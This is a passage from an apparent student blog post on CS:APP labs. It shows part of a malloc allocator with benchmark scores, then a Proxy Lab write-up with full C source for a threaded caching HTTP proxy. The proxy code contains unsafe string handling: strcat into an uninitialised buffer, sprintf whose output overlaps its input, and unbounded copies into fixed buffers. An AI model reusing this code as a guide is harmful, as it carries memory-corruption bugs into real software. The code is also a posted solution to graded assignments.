seg_idx = 1;
}

while (seg_idx < N_SEGLIST) {
bp = head_seglp[seg_idx];
while (bp != NULL) {
if (asize <= GET_SIZE(HDRP(bp))) {
best_bp = bp;
best_size = GET_SIZE(HDRP(bp));
break;
}
bp = GET_NXTP(bp);
}
if (best_bp != NULL)
break;
seg_idx++;
}

if (best_bp == NULL || seg_idx == N_SEGLIST)
return NULL;

size_t i = 0;
while (i < iteration && bp != NULL) {
if (asize <= GET_SIZE(HDRP(bp)) && GET_SIZE(HDRP(bp)) < best_size) {
best_bp = bp;
best_size = GET_SIZE(HDRP(bp));
}
bp = GET_NXTP(bp);
++i;
}

return best_bp;
}

static void* find_fit(size_t asize)
{
void* bp = find_fit_better_hit_seglist_immediate(asize);
return bp;
}

static void* place_threshold(void* bp, size_t csize, size_t asize, const size_t threshold)
{
if (asize > threshold) {
size_t mini = (csize - asize > DWORD) ? 0 : 1 << 2;
if (mini) {
PUT(HDRP(bp), PACK(csize - asize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
}
else {
PUT(HDRP(bp), PACK(csize - asize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
PUT(FTRP(bp), PACK(csize - asize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
}
insert_freeblock(bp);
bp = NEXT_BLKP(bp);
PUT(HDRP(bp), PACK(asize, mini, 0, 1));
set_nextblock_alloc_prev(bp, 1 << 1);
}
else {
void* v_bp = bp;
size_t amini = asize > DWORD ? 0 : 1 << 2;
size_t cmini = (csize - asize > DWORD) ? 0 : 1 << 2;
PUT(HDRP(bp), PACK(asize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 1));
bp = NEXT_BLKP(bp);
if (cmini) {
PUT(HDRP(bp), PACK(csize - asize, amini, 1 << 1, 0));
}
else {
PUT(HDRP(bp), PACK(csize - asize, amini, 1 << 1, 0));
PUT(FTRP(bp), PACK(csize - asize, amini, 1 << 1, 0));
}
insert_freeblock(bp);
set_nextblock_mini_prev(bp, cmini);
bp = v_bp;
}

return bp;
}

static void* place_threshold_realloc(void* bp, void* n_bp, size_t fsize, size_t asize, size_t psize, const size_t threshold)
{
// Be CAREFUL of the instruction order: memcpy > PUT
if (asize > threshold) {
void* m_bp = n_bp;
size_t mini = (fsize - asize > DWORD) ? 0 : 1 << 2;
PUT(HDRP(n_bp), PACK(fsize - asize, GET_PREV_MINI(HDRP(n_bp)), GET_PREV_ALLO(HDRP(n_bp)), 0));
n_bp = NEXT_BLKP(n_bp);
memcpy(n_bp, bp, psize);
PUT(HDRP(n_bp), PACK(asize, mini, 0, 1));
set_nextblock_mini_prev(n_bp, 0);
set_nextblock_alloc_prev(n_bp, 1 << 1);
if (!mini)
PUT(FTRP(m_bp), PACK(fsize - asize, GET_PREV_MINI(HDRP(m_bp)), GET_PREV_ALLO(HDRP(m_bp)), 0));
insert_freeblock(m_bp);
}
else {
size_t amini = asize > DWORD ? 0 : 1 << 2;
size_t fmini = (fsize - asize > DWORD) ? 0 : 1 << 2;
PUT(HDRP(n_bp), PACK(asize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(n_bp)), 1));
memcpy(n_bp, bp, psize);
bp = n_bp;
n_bp = NEXT_BLKP(n_bp);
if (fmini) {
PUT(HDRP(n_bp), PACK(fsize - asize, amini, 1 << 1, 0));
}
else {
PUT(HDRP(n_bp), PACK(fsize - asize, amini, 1 << 1, 0));
PUT(FTRP(n_bp), PACK(fsize - asize, amini, 1 << 1, 0));
}
set_nextblock_mini_prev(n_bp, fmini);
set_nextblock_alloc_prev(n_bp, 0);
insert_freeblock(n_bp);
n_bp = bp;
}

return n_bp;
}

static void* place(void* bp, size_t asize)
{
size_t csize = GET_SIZE(HDRP(bp));
delete_freeblock(bp);

// Normal block
if (csize >= asize + DWORD) {
bp = place_threshold(bp, csize, asize, 64);
}
// No split
else {
PUT(HDRP(bp), PACK(csize, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 1));
set_nextblock_alloc_prev(bp, 1 << 1);
set_nextblock_mini_prev(bp, csize > DWORD ? 0 : 1 << 2);
}

return bp;
}

static void* extend_heap(size_t words)
{
char *bp;
size_t size;
size = (words % 2) ? (words + 1) * SWORD : words * SWORD;
if ((long)(bp = mem_sbrk(size)) == -1)
return NULL;
size_t prev_alloc = GET_PREV_ALLO(HDRP(bp));
size_t prev_mini = GET_PREV_MINI(HDRP(bp));
PUT(HDRP(bp), PACK(size, prev_mini, prev_alloc, 0));
PUT(FTRP(bp), PACK(size, prev_mini, prev_alloc, 0));
PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 0, 0, 1));
insert_freeblock(bp);
return coalesce(bp);
}

/*
* mm_init - initialize the malloc package.
*/
int mm_init(void)
{
void* bp;

if ((heap_listp = mem_sbrk(4 * SWORD)) == (void *)-1)
return -1;
PUT(heap_listp, 0);
PUT(heap_listp + 1 * SWORD, PACK(DWORD, 1 << 2, 1 << 1, 1));
PUT(heap_listp + 2 * SWORD, PACK(DWORD, 1 << 2, 1 << 1, 1));
PUT(heap_listp + 3 * SWORD, PACK(0, 1 << 2, 1 << 1, 1));
heap_listp += 2 * SWORD;

for (int i = 0; i < N_SEGLIST; ++i)
head_seglp[i] = NULL;

if ((bp = extend_heap(CHUNKSIZE / SWORD)) == NULL)
return -1;
return 0;
}

/*
* mm_malloc - Allocate a block by incrementing the brk pointer.
* Always allocate a block whose size is a multiple of the alignment.
*/
void* mm_malloc(size_t size)
{
size_t asize;
size_t extendsize;
char* bp;

if (size == 0)
return NULL;

asize = DWORD * ((size + SWORD + DWORD - 1) / DWORD);

if ((bp = find_fit(asize)) != NULL) {
return place (bp, asize);
}

extendsize = MAX(asize, CHUNKSIZE);
if ((bp = extend_heap(extendsize / SWORD)) == NULL)
return NULL;
return place(bp, asize);
}

/*
* mm_free - Freeing a block does nothing.
*/
void mm_free(void *bp)
{
size_t size = GET_SIZE(HDRP(bp));
size_t mini = size > DWORD ? 0 : 1 << 2;
size_t prev_alloc = GET_PREV_ALLO(HDRP(bp));
size_t prev_mini = GET_PREV_MINI(HDRP(bp));
PUT(HDRP(bp), PACK(size, prev_mini, prev_alloc, 0));
if (!mini)
PUT(FTRP(bp), PACK(size, prev_mini, prev_alloc, 0));
set_nextblock_alloc_prev(bp, 0);
set_nextblock_mini_prev(bp, mini);
insert_freeblock(bp);
coalesce(bp);
}

/*
* mm_realloc - Implemented simply in terms of mm_malloc and mm_free
*/

void* mm_realloc(void* bp, size_t size)
{
if (bp == NULL)
return mm_malloc(size);

if (size == 0) {
mm_free(bp);
return NULL;
}

size_t osize = GET_SIZE(HDRP(bp));
size_t asize = DWORD * ((size + SWORD + DWORD - 1) / DWORD);
size_t psize = MIN(osize, asize) - SWORD;

void* new_bp = coalesce_realloc(bp);
size_t fsize = GET_SIZE(HDRP(new_bp));

// Block capacity not enough for realloc
if (fsize < asize) {
// Next block is epilogue, extend only the size you need
if (!GET_SIZE(HDRP(NEXT_BLKP(new_bp)))) {
if ((long)mem_sbrk(asize - fsize) == -1)
return NULL;
PUT(HDRP(new_bp), PACK(asize, GET_PREV_MINI(HDRP(new_bp)), GET_PREV_ALLO(HDRP(new_bp)), 1));
memcpy(new_bp, bp, psize);
PUT(HDRP(NEXT_BLKP(new_bp)), PACK(0, 0, 1, 1));
return new_bp;
}
else {
void* m_bp = mm_malloc(size);
if (m_bp == NULL)
return NULL;
memcpy(m_bp, bp, psize);
mm_free(new_bp);
return m_bp;
}
}
else if (fsize >= asize + DWORD) {
return place_threshold_realloc(bp, new_bp, fsize, asize, psize, 64);
}
else {
PUT(HDRP(new_bp), PACK(fsize, GET_PREV_MINI(HDRP(new_bp)), GET_PREV_ALLO(HDRP(new_bp)), 1));
memcpy(new_bp, bp, psize);
set_nextblock_alloc_prev(new_bp, 1 << 1);
set_nextblock_mini_prev(new_bp, fsize > DWORD ? 0 : 1 << 1);
return new_bp;
}
}

What about this time for our cute score?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
trace  valid  util     ops      secs  Kops
0 yes 99% 5694 0.000162 35235
1 yes 100% 5848 0.000192 30427
2 yes 99% 6648 0.000184 36091
3 yes 100% 5380 0.000141 38048
4 yes 94% 14400 0.000262 54983
5 yes 94% 4800 0.000325 14769
6 yes 94% 4800 0.000311 15449
7 yes 87% 12000 0.004518 2656
8 yes 74% 24000 0.011462 2094
9 yes 100% 14401 0.018781 767
10 yes 99% 14401 0.001136 12683
11 yes 78% 57716 0.159908 361
12 yes 78% 100000 0.316146 316
13 yes 99% 20000 0.000295 67912
14 yes 70% 200400 0.009781 20490
15 yes 58% 6495 0.002252 2884
Total 89% 496983 0.525856 945

Perf index = 53 (util) + 40 (thru) = 93/100

A score of 93 out of 100! That's good enough for our (at least my own) target. As you can see, there are still space to improve utility but this requires much more deeper analysis into the trace files and smarter strategies to eliminate fragmentation.

Lab 8: Proxy Lab

In this lab, you're required to implement a simple proxy server that receives requests from clients and transmit them to the destination server. When the server sends back the response, your proxy transmits it back to the client.

I used pre-threading as it's simple to implement and achieves good efficiency. The entire lab can be done in the following steps:

  1. Create threads, initialize them and wait for available items (client connections).
  2. Use an infinite loop to listen for client connections and insert file descriptors to the queue.
  3. For each connection, parse the uri, and check if it's already in the cache.
  4. If it's not in the cache, extract the host, port and file path, build headers and open a new connection to the server. Keep reading the response from the server and writing to the client. Don't forget to cache the content.
  5. If it's already in the cache, just read the content from the cache and write it back to the client.

I leveraged the first class read-write solution in the textbook. In this solution, readers have a higher priority than writers. Writing is allowed only when all readers finish their work.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
#include <stdio.h>
#include "csapp.h"

/* Recommended max cache and object sizes */
#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400
#define MAX_CACHE_BLK 10
#define NTHREADS 4
#define SBUFSIZE 16

static const char *user_agent_hdr = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3\r\n";
static const char *connection_hdr = "Connection: close\r\n";
static const char *proxy_hdr = "Proxy-Connection: close\r\n";

typedef struct {
char uri[MAXLINE];
char buf[MAX_OBJECT_SIZE];
int buf_size;
int read_cnt;
int stamp;
sem_t mutex;
sem_t write;
} cache_t;

cache_t caches[MAX_CACHE_BLK];

typedef struct {
int *buf;
int n;
int front;
int rear;
sem_t mutex;
sem_t slots;
sem_t items;
} sbuf_t;

sbuf_t sbuf;

void doit (int fd);
void parse_uri (const char *uri, char *host, char *port, char *filename);
void build_headers (rio_t *rp, char *buf, char *method, char *filename, char *version, char *host);
void clienterror (int fd, char *cause, char *errnum, char *shortmsg, char *longmsg);

void sbuf_init (sbuf_t *sp, int n);
void sbuf_deinit (sbuf_t *sp);
void sbuf_insert (sbuf_t *sp, int item);
int sbuf_remove (sbuf_t *sp);

void cache_init (cache_t *caches, int cache_cnt);
int cache_read (cache_t *cache, char *buf);
void cache_write (cache_t *cache, char *uri, char *buf, int size);
int cache_search (cache_t *caches, int cache_cnt, char *uri);
void cache_update (cache_t *caches, int cache_cnt, cache_t *cache);
int cache_evict (cache_t *caches, int cache_cnt);
int cache_latest (cache_t *caches, int cache_cnt);

void* thread(void *vargp);

int main (int argc, char **argv)
{
int i, listenfd, connfd;
char hostname[MAXLINE], port[MAXLINE];
socklen_t clientlen;
struct sockaddr_storage clientaddr;
pthread_t tid[NTHREADS];

if (argc != 2) {
fprintf (stderr, "usage: %s <port>\n", argv[0]);
exit (0);
}

listenfd = Open_listenfd (argv[1]);
sbuf_init (&sbuf, SBUFSIZE);
cache_init (caches, MAX_CACHE_BLK);
for (i = 0; i < NTHREADS; i++)
Pthread_create (&tid[i], NULL, thread, NULL);

while (1) {
clientlen = sizeof (clientaddr);
connfd = Accept (listenfd, (SA *) &clientaddr, &clientlen);
Getnameinfo((SA *) &clientaddr, clientlen, hostname, MAXLINE, port, MAXLINE, 0);
printf ("Accepted connection from (%s, %s)\n", hostname, port);
sbuf_insert (&sbuf, connfd);
}

sbuf_deinit (&sbuf);
}

void sbuf_init (sbuf_t *sp, int n)
{
sp->buf = Calloc (n, sizeof (int));
sp->n = n;
sp->front = sp->rear = 0;
Sem_init (&sp->mutex, 0, 1);
Sem_init (&sp->slots, 0, n);
Sem_init (&sp->items, 0, 0);
}

void sbuf_deinit (sbuf_t *sp)
{
Free (sp->buf);
}

void sbuf_insert (sbuf_t *sp, int item)
{
P (&sp->slots);
P (&sp->mutex);
sp->buf[(++sp->rear)%(sp->n)] = item;
V (&sp->mutex);
V (&sp->items);
}

int sbuf_remove (sbuf_t *sp)
{
int item;
P (&sp->items);
P (&sp->mutex);
item = sp->buf[(++sp->front)%(sp->n)];
V (&sp->mutex);
V (&sp->slots);
return item;
}

void *thread (void* vargp)
{
Pthread_detach (pthread_self());
while (1) {
int connfd = sbuf_remove (&sbuf);
doit (connfd);
Close (connfd);
}
}

void doit (int fd)
{
char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
char host[MAXLINE], port[MAXLINE], filename[MAXLINE];
rio_t rio, t_rio;
int n_read;

/* Read request line and headers */
Rio_readinitb (&rio, fd);
if (!Rio_readlineb (&rio, buf, MAXLINE))
return;
printf ("%s", buf);
sscanf (buf, "%s %s %s", method, uri, version);
if (strcasecmp (method, "GET")) {
clienterror (fd, method, "501", "Not Implemented",
"Tiny does not implement this method");
return;
}
if (!strcmp (version, "HTTP/1.1")) {
strcpy (version, "HTTP/1.0");
}

int cache_idx = cache_search (caches, MAX_CACHE_BLK, uri);
if (cache_idx == -1) { // Cache not found
parse_uri (uri, host, port, filename);
build_headers (&rio, buf, method, filename, version, host);

char t_buf[MAX_OBJECT_SIZE];
*t_buf = '\0';
int t_size = 0;

int clientfd = Open_clientfd (host, port);
Rio_readinitb (&t_rio, clientfd);
Rio_writen (clientfd, buf, strlen (buf));
while ((n_read = Rio_readlineb (&t_rio, buf, MAXLINE)) > 0) {
Rio_writen (fd, buf, n_read);
strcat (t_buf, buf);
t_size += n_read;
}
if (t_size < MAX_OBJECT_SIZE) {
int idx = cache_evict (caches, MAX_CACHE_BLK);
cache_write (&caches[idx], uri, t_buf, t_size);
}
Close (clientfd);
}
else { // Cache found
int n_read = cache_read (&caches[cache_idx], buf);
Rio_writen (fd, buf, n_read);
}
}

void parse_uri (const char *uri, char *host, char *port, char *filename)
{
char *ptr;

*host = '\0';
*port = '\0';
*filename = '\0';

ptr = strstr (uri, "//");
ptr += 2;
char *p_filename = strstr (ptr, "/");
char *p_port = strstr (ptr, ":");

if (p_port) {
if (p_filename) {
size_t len = p_filename - p_port - 1;
strncpy (port, p_port + 1, len);
*(port + len) = '\0';
} else {
strcpy (port, p_port + 1);
}
} else {
strcpy (port, "80");
}

if (p_filename) {
strcpy (filename, p_filename);
}

if (p_port) {
size_t len = p_port - ptr;
strncpy (host, ptr, len);
*(host + len) = '\0';
} else if (p_filename) {
size_t len = p_filename - ptr;
strncpy (host, ptr, len);
*(host + len) = '\0';
} else {
strcpy (host, ptr);
}
}

void build_headers (rio_t *rp, char *buf, char *method, char *filename, char *version, char *hostname)
{
char req[MAXLINE], host[MAXLINE], remaining[MAXLINE];
char t_buf[MAXLINE];

sprintf (req, "GET %s HTTP/1.0\r\n", filename);
sprintf (host, "HOST: %s\r\n", hostname);

Rio_readlineb (rp, t_buf, MAXLINE);
while (strcmp (t_buf, "\r\n")) {
if (!strncasecmp (t_buf, "HOST", 4)) {
strcpy (host, t_buf);
} else {
strcat (remaining, t_buf);
}
Rio_readlineb (rp, t_buf, MAXLINE);
}

sprintf (buf, "%s", req);
sprintf (buf, "%s%s", buf, host);
sprintf (buf, "%s%s", buf, user_agent_hdr);
sprintf (buf, "%s%s", buf, connection_hdr);
sprintf (buf, "%s%s", buf, proxy_hdr);
sprintf (buf, "%s%s", buf, remaining);
sprintf (buf, "%s\r\n", buf);
}

void cache_init (cache_t *caches, int cache_cnt)
{
for (int i = 0; i < cache_cnt; ++i) {
caches[i].buf_size = 0;
caches[i].read_cnt = 0;
caches[i].stamp = 0;
Sem_init (&caches[i].mutex, 0, 1);
Sem_init (&caches[i].write, 0, 1);
}
}

int cache_read (cache_t *cache, char *buf)
{
P (&cache->mutex);
cache->read_cnt++;
if (cache->read_cnt == 1)
P (&cache->write);
V (&cache->mutex);

strncpy (buf, cache->buf, cache->buf_size);
cache_update (caches, MAX_CACHE_BLK, cache);

P (&cache->mutex);
cache->read_cnt--;
if (cache->read_cnt == 0)
V (&cache->write);
V (&cache->mutex);

return cache->buf_size;
}

void cache_write (cache_t *cache, char *uri, char *buf, int size)
{
P (&cache->write);
strcpy (cache->uri, uri);
strcpy (cache->buf, buf);
cache->buf_size = size;
cache_update (caches, MAX_CACHE_BLK, cache);
V (&cache->write);
}

int cache_latest (cache_t *caches, int cache_cnt)
{
int latest = 0;
for (int i = 0; i < cache_cnt; ++i) {
if (caches[i].stamp < latest)
latest = caches[i].stamp;
}
return latest;
}

int cache_search (cache_t *caches, int cache_cnt, char *uri)
{
for (int i = 0; i < cache_cnt; ++i)
if (!strcmp (caches[i].uri, uri))
return i;
return -1;
}

void cache_update (cache_t *caches, int cache_cnt, cache_t *cache)
{
cache->stamp = cache_latest (caches, cache_cnt) - 1;
}

int cache_evict (cache_t *caches, int cache_cnt)
{
int least_stamp = caches[0].stamp;
int least_idx = 0;
for (int i = 0; i < cache_cnt; ++i) {
if (caches[i].stamp == 0) {
return i;
}
if (caches[i].stamp > least_stamp) {
least_stamp = caches[i].stamp;
least_idx = i;
}
}
return least_idx;
}

void clienterror(int fd, char *cause, char *errnum, char *shortmsg, char *longmsg)
{
char buf[MAXLINE];

/* Print the HTTP response headers */
sprintf(buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
Rio_writen(fd, buf, strlen(buf));
sprintf(buf, "Content-type: text/html\r\n\r\n");
Rio_writen(fd, buf, strlen(buf));

/* Print the HTTP response body */
sprintf(buf, "<html><title>Tiny Error</title>");
Rio_writen(fd, buf, strlen(buf));
sprintf(buf, "<body bgcolor=""ffffff"">\r\n");
Rio_writen(fd, buf, strlen(buf));
sprintf(buf, "%s: %s\r\n", errnum, shortmsg);
Rio_writen(fd, buf, strlen(buf));
sprintf(buf, "<p>%s: %s\r\n", longmsg, cause);
Rio_writen(fd, buf, strlen(buf));
sprintf(buf, "<hr><em>The Tiny Web server</em>\r\n");
Rio_writen(fd, buf, strlen(buf));
}